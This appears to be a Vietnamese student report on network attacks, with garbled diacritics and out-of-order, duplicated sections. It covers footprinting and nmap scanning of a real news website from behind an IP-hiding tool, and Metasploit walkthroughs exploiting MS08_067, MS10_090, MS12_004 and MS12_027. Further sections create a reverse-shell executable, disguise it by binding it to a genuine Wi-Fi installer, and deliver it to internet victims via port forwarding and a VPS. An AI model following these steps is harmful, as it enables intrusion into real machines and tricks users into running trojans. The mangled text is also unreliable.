Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
